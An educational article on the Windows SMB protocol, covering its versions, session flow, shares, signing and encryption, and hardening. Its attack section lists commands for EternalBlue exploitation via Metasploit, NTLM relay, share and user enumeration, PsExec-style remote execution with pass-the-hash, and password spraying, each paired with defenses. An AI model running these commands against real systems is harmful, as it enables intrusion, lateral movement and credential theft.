SMB — The Protocol That Runs (and Haunts) Enterprise Networks
If you work in a Windows environment, you use SMB every day — probably without knowing it. Every time you access a shared drive (\\server\share), open a file on a network share, or your Group Policy updates from the domain controller’s SYSVOL — that’s SMB.
SMB (Server Message Block) is the protocol that enables file sharing, printer sharing, and inter-process communication on Windows networks. It’s been around since the 1980s, it’s deeply embedded in Windows infrastructure, and it’s responsible for some of the most catastrophic cyberattacks in history.
WannaCry (2017) — infected 230,000+ computers across 150 countries in a single day. The propagation mechanism? SMB exploit (EternalBlue).
NotPetya (2017) — caused over $10 billion in damages globally. Propagation? SMB (EternalBlue + NTLM credential theft).
Every Active Directory pentest ever — lateral movement via SMB, NTLM relay via SMB, credential extraction via SMB.
Understanding SMB is essential if you work in networking, security, or system administration.
What is SMB?
SMB (Server Message Block) is a client-server protocol for sharing access to files, printers, serial ports, and other resources on a network. It operates at the Application Layer (Layer 7 of the OSI model) and typically runs on top of TCP/IP.
The core use cases:
| Use Case | Example |
|---|---|
| File sharing | Accessing \\fileserver\documents from your workstation |
| Printer sharing | Printing to a network printer via \\printserver\LaserJet |
| Named pipes | Inter-process communication (IPC) — used by Windows services, RPC |
| Remote administration | PsExec, smbexec, administrative shares (C$, ADMIN$) |
| Group Policy | Workstations reading GPOs from \\domain\SYSVOL |
| Browsing | The “Network” section in File Explorer |
When you type a UNC path like \\server\share\file.txt in Windows, the OS establishes an SMB session, authenticates (usually with your current domain credentials via Kerberos or NTLM), and streams the file over the network.
SMB Versions — A Brief History
| Version | Year | Key Changes |
|---|---|---|
| SMB 1.0 / CIFS | 1983/1996 | Original protocol. Chatty, insecure, no encryption |
| SMB 2.0 | 2006 (Vista) | Reduced chattiness, larger reads/writes, better performance |
| SMB 2.1 | 2010 (Win 7) | Large MTU support, leasing (oplock improvements) |
| SMB 3.0 | 2012 (Win 8) | Encryption, multichannel, RDMA, transparent failover |
| SMB 3.0.2 | 2014 (Win 8.1) | Cluster dialect fencing |
| SMB 3.1.1 | 2015 (Win 10) | Pre-authentication integrity, encryption negotiation, AES-128-GCM |
The critical security boundary: SMB 1.0 is fundamentally insecure and should be disabled everywhere. EternalBlue (the WannaCry exploit) targeted SMB 1.0. Microsoft has been pushing to deprecate it since 2017, and Windows 10/11 and Server 2019+ have it disabled by default.
How SMB Works
The Basics
SMB operates on TCP port 445 (direct SMB over TCP). Historically, it also ran over NetBIOS on ports 137-139, but modern SMB uses port 445 exclusively.
An SMB session follows this flow:
Client Server
| |
| 1. TCP connection (port 445) |
| ────────────────────────────────────> |
| |
| 2. Negotiate (which SMB version?) |
| ────────────────────────────────────> |
| <──────────────────────────────────── |
| |
| 3. Session Setup (authenticate) |
| ────────────────────────────────────> |
| <──────────────────────────────────── |
| |
| 4. Tree Connect (access a share) |
| ────────────────────────────────────> |
| <──────────────────────────────────── |
| |
| 5. Open / Read / Write / Close |
| ────────────────────────────────────> |
| <──────────────────────────────────── |
| |
| 6. Tree Disconnect / Logoff |
| ────────────────────────────────────> |
Step 1-2: Negotiate
The client and server agree on the highest SMB version both support. In SMB 3.1.1, this step also includes pre-authentication integrity — the negotiation messages are hashed (SHA-512) to prevent tampering. This prevents downgrade attacks where an attacker forces SMB 1.0.
Step 3: Session Setup (Authentication)
The client authenticates, typically using:
- Kerberos — Default in domain environments. Ticket-based, secure.
- NTLM — Fallback when Kerberos isn’t available (IP access, cross-forest, workgroup).
In domain environments, this is usually transparent — your Windows session already has a Kerberos TGT, and the SMB client requests a service ticket for the file server automatically. You never see a login prompt.
Step 4: Tree Connect
After authentication, the client connects to a specific share — a named resource on the server. The share name is the part after the server name in a UNC path:
\\SERVER\Documents → share name is "Documents"
\\SERVER\C$ → share name is "C$" (administrative share)
\\SERVER\IPC$ → share name is "IPC$" (inter-process communication)
Step 5: File Operations
Once connected, the client can open files, read data, write data, list directories, and perform other file operations — just like accessing a local filesystem.
Shares
Regular Shares
Created by administrators and visible in the network browser:
# List shares on a server (from Windows)
> net view \\fileserver
Shared resources at \\fileserver
Share name Type Comment
------------------------------------------
Documents Disk Company documents
Public Disk Public files
Printers Print Shared printers
Administrative Shares (Hidden)
Windows automatically creates hidden shares for each drive and for admin access:
| Share | Maps To | Access |
|---|---|---|
C$ |
C:\ |
Local admins only |
D$ |
D:\ |
Local admins only |
ADMIN$ |
C:\Windows |
Local admins only |
IPC$ |
Named pipes | Authenticated users |
These shares have a $ suffix, making them hidden from casual browsing — but they’re fully accessible to anyone with local admin credentials. This is how tools like PsExec work: they copy an executable to ADMIN$ and create a remote service.
# Access the C drive of a remote server (needs admin)
> dir \\fileserver\C$
IPC$ — The Special One
IPC$ (Inter-Process Communication) is used for named pipes — a mechanism for processes to communicate over the network. It’s the foundation for:
- Remote Procedure Calls (RPC)
- Remote service management (sc.exe)
- Remote registry access
- SMB enumeration (listing shares, users, groups)
A null session (anonymous IPC$ connection) was a classic attack vector on older Windows versions — it allowed unauthenticated enumeration of users, groups, and shares. Modern Windows restricts this by default, but misconfigurations still occur.
SMB on the Wire — Packet Structure
An SMB2 packet has this structure:
┌──────────────────────────────────────┐
│ NetBIOS Session Header (4 bytes) │
├──────────────────────────────────────┤
│ SMB2 Header (64 bytes) │
│ - Protocol ID (0xFE 'S' 'M' 'B') │
│ - Command (Negotiate, TreeConnect, │
│ Create, Read, Write, Close, etc.) │
│ - Message ID (for async tracking) │
│ - Session ID │
│ - Tree ID │
│ - Signature (if signing enabled) │
├──────────────────────────────────────┤
│ Command-specific payload │
│ (varies by command) │
└──────────────────────────────────────┘
You can capture and analyze SMB traffic with Wireshark:
# Capture SMB traffic on an interface
$ sudo tshark -i eth0 -f "tcp port 445" -Y "smb2"
# Filter specific operations
$ tshark -r capture.pcap -Y "smb2.cmd == 5" # Read requests
$ tshark -r capture.pcap -Y "smb2.cmd == 6" # Write requests
SMB Security Features
SMB Signing
SMB signing adds a cryptographic signature to each SMB packet, preventing man-in-the-middle and NTLM relay attacks. The signature is computed using the session key derived during authentication.
Signed packet:
┌────────────────────────┐
│ SMB Header │
│ ... │
│ Signature: HMAC-SHA256 │ ← computed over the entire packet
│ ... │
├────────────────────────┤
│ Payload │
└────────────────────────┘
If an attacker modifies the packet (e.g., in an NTLM relay), the signature won’t match and the server rejects it.
Status by default:
| System | Signing |
|---|---|
| Domain Controllers | Required (both client and server) |
| Domain Members | Enabled but not required |
| Workgroup / Standalone | Disabled |
The critical gap: domain members enable but don’t require signing. This means SMB signing only happens when both sides require it. If the server doesn’t require signing, a relay attacker can strip it. This is why enforcing SMB signing on all systems is a top security recommendation.
# Check SMB signing configuration
Get-SmbServerConfiguration | Select EnableSecuritySignature, RequireSecuritySignature
# Enforce signing (via Group Policy or PowerShell)
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
SMB Encryption (SMB 3.0+)
SMB 3.0 introduced transport encryption — the entire SMB session is encrypted using AES-128-CCM (SMB 3.0) or AES-128-GCM (SMB 3.1.1).
This encrypts the payload — file contents, directory listings, everything. Even if an attacker captures the traffic, they can’t read it.
# Enable encryption on a share
Set-SmbShare -Name "Confidential" -EncryptData $true
# Require encryption server-wide
Set-SmbServerConfiguration -EncryptData $true -Force
# Reject unencrypted clients
Set-SmbServerConfiguration -RejectUnencryptedAccess $true -Force
SMB 3.1.1 Pre-Authentication Integrity
SMB 3.1.1 hashes the negotiate and session setup messages using SHA-512. This creates a pre-authentication integrity hash that prevents downgrade attacks — an attacker can’t tamper with the negotiation to force an older, weaker protocol version.
SMB Attacks
EternalBlue (MS17-010)
The most infamous SMB vulnerability. Developed by the NSA, leaked by the Shadow Brokers in April 2017, and used in WannaCry and NotPetya within months.
EternalBlue exploits a buffer overflow in the SMBv1 server (srv.sys) during the handling of Transaction 2 requests. A specially crafted SMB packet triggers the overflow, allowing remote code execution with SYSTEM privileges — no authentication required.
# Check if a host is vulnerable
$ nmap --script smb-vuln-ms17-010 -p 445 target
# Exploit with Metasploit
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 10.0.0.5
msf> exploit
Defense: Disable SMB 1.0, apply MS17-010 patch. On modern Windows (10/11, Server 2019+), SMBv1 is disabled by default.
# Disable SMBv1
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
NTLM Relay via SMB
When SMB signing is not required, an attacker can relay NTLM authentication to a different server. We covered this in the Active Directory article, but here’s the SMB-specific version:
Victim → Attacker → Target Server
NTLM auth Relayed auth
- Attacker poisons LLMNR/NBT-NS to intercept a victim’s SMB connection
- Victim’s machine sends NTLM authentication to the attacker
- Attacker relays the authentication to a target server (a different machine)
- Target server accepts the authentication (signing not required)
- Attacker has an authenticated SMB session as the victim on the target
# Start the relay
$ ntlmrelayx.py -t smb://10.0.0.5 -smb2support
# Or with specific action
$ ntlmrelayx.py -t smb://10.0.0.5 -c "whoami" -smb2support
Defense: Enforce SMB signing on all systems. Disable LLMNR and NBT-NS.
SMB Enumeration
With valid credentials (or sometimes even without), attackers enumerate shares, users, and groups:
# List shares
$ smbclient -L //10.0.0.5 -U 'user%password'
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk Company docs
IPC$ IPC Remote IPC
# Access a share
$ smbclient //10.0.0.5/Documents -U 'user%password'
smb: \> ls
smb: \> get confidential.docx
# Enumerate users via RPC over IPC$
$ rpcclient -U 'user%password' 10.0.0.5
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
# Comprehensive enumeration
$ enum4linux -a 10.0.0.5
PsExec / Remote Execution via SMB
PsExec (and its Impacket equivalent) uses SMB to achieve remote command execution:
- Connect to
ADMIN$orC$share - Upload a service executable
- Create and start a Windows service via RPC (over IPC$)
- The service executes the command
- Output is piped back over a named pipe
# Impacket's psexec
$ psexec.py domain/admin:[email protected]
# With pass-the-hash
$ psexec.py domain/[email protected] -hashes :ntlm_hash
# smbexec (doesn't drop a binary — more stealthy)
$ smbexec.py domain/admin:[email protected]
Defense: Restrict local admin access, use LAPS for local admin passwords, monitor for service creation events (Event ID 7045).
Password Spraying via SMB
Test a small set of passwords against many accounts:
$ crackmapexec smb 10.0.0.0/24 -u users.txt -p 'Password123!' --continue-on-success
SMB 10.0.0.5 445 DC01 [+] CORP\jsmith:Password123!
SMB 10.0.0.12 445 WS01 [+] CORP\admin:Password123!
Defense: Smart lockout policies, monitor for distributed failed logons.
Configuring SMB Securely
Disable SMBv1 (Critical)
# Windows 10/11
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
# Windows Server
Remove-WindowsFeature FS-SMB1
# Verify
Get-SmbServerConfiguration | Select EnableSMB1Protocol
Enforce Signing
Via Group Policy:
Computer Configuration → Policies → Windows Settings → Security Settings
→ Local Policies → Security Options
→ "Microsoft network server: Digitally sign communications (always)" → Enabled
→ "Microsoft network client: Digitally sign communications (always)" → Enabled
Enable Encryption
# Per-share
Set-SmbShare -Name "Finance" -EncryptData $true
# Server-wide
Set-SmbServerConfiguration -EncryptData $true
Restrict Access
# Disable administrative shares (C$, ADMIN$)
# Registry: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
# AutoShareServer = 0 (servers), AutoShareWks = 0 (workstations)
# Restrict who can access shares
Grant-SmbShareAccess -Name "Documents" -AccountName "CORP\Engineering" -AccessRight Full
Revoke-SmbShareAccess -Name "Documents" -AccountName "Everyone"
Audit SMB Access
# Enable SMB auditing
Set-SmbServerConfiguration -AuditSmb1Access $true
# Check for SMBv1 usage
Get-SmbSession | Where-Object Dialect -lt "2.0.2"
SMB vs NFS — When to Use What
| Aspect | SMB | NFS |
|---|---|---|
| Primary OS | Windows | Linux/Unix |
| Authentication | Kerberos/NTLM (user-based) | Kerberos/AUTH_SYS (host or user-based) |
| Encryption | Built-in (SMB 3.0+) | Kerberos encryption or IPsec |
| Port | 445 | 2049 |
| Performance | Optimized for Windows | Optimized for Linux |
| Best for | Windows file sharing, AD environments | Linux servers, HPC, containers |
In mixed environments, you’ll often see both — SMB for Windows workstations accessing file shares, NFS for Linux servers mounting shared storage.
Final Thoughts
SMB is one of those protocols you can’t avoid if you work with Windows. It’s everywhere — file shares, Group Policy, authentication, remote administration, printer access. And because it’s everywhere, it’s one of the biggest attack surfaces in enterprise networks.
The security story of SMB is really a story of two eras. SMB 1.0 was designed in the 1980s when nobody worried about network attackers — it’s fundamentally broken and should be disabled everywhere. SMB 3.1.1, on the other hand, has encryption, pre-authentication integrity, signing, and secure negotiation. The protocol itself is solid — the problems come from misconfigurations (signing not enforced) and legacy deployments (SMBv1 still enabled).
If you take three things from this article: disable SMBv1, enforce signing on all systems, and enable encryption for sensitive shares. Those three settings eliminate the majority of SMB-based attacks.
Thanks for reading!
